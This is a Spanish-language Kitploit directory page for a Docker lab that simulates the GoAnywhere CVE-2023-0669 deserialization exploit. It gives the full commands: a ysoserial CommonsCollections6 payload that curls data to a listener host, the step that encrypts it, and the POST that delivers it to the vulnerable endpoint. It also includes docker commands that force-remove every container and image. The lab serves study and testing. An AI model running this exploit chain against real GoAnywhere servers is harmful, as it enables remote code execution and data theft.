Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2023-0669-simulation | Kitploit
Herramientas/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosComando y Control
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 7 mesesAún no revisado

Estructura del proyecto

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← creado automáticamente (exfiltración)

2. Inicia los 3 contenedores (atacante, vulnerable, listener)

docker-compose up --build

Problema: error KeyError: 'ContainerConfig' al ejecutar docker compose up

Este proyecto requiere:

  • Docker Engine: v24 o v25 como mínimo
  • Docker Compose: v2.20+ (incluido automáticamente con Docker) KeyError: 'ContainerConfig' al ejecutar docker compose up. Esto proviene generalmente de metadatos de Docker obsoletos o corruptos, o de imágenes antiguas. Elimina los contenedores, imágenes y metadatos dañados:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

Luego reconstruye limpiamente:

docker compose build --no-cache

docker compose up

3. Entra en el contenedor del atacante

docker exec -it attacker bash

Generación del payload seguro (solo envía un mensaje)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

Cifrado del payload

java CVE_2023_0669_helper payload.ser 1

→ Copia toda la larga cadena que se muestra (Ctrl+A y luego Ctrl+C)

Envío del exploit (reemplaza LA_CHAINE por lo que acabas de copiar)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. Resultado inmediato

Verás en los logs del listener (o en la carpeta ./received en tu PC):

PWNED ! Recibido 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

Descargar herramienta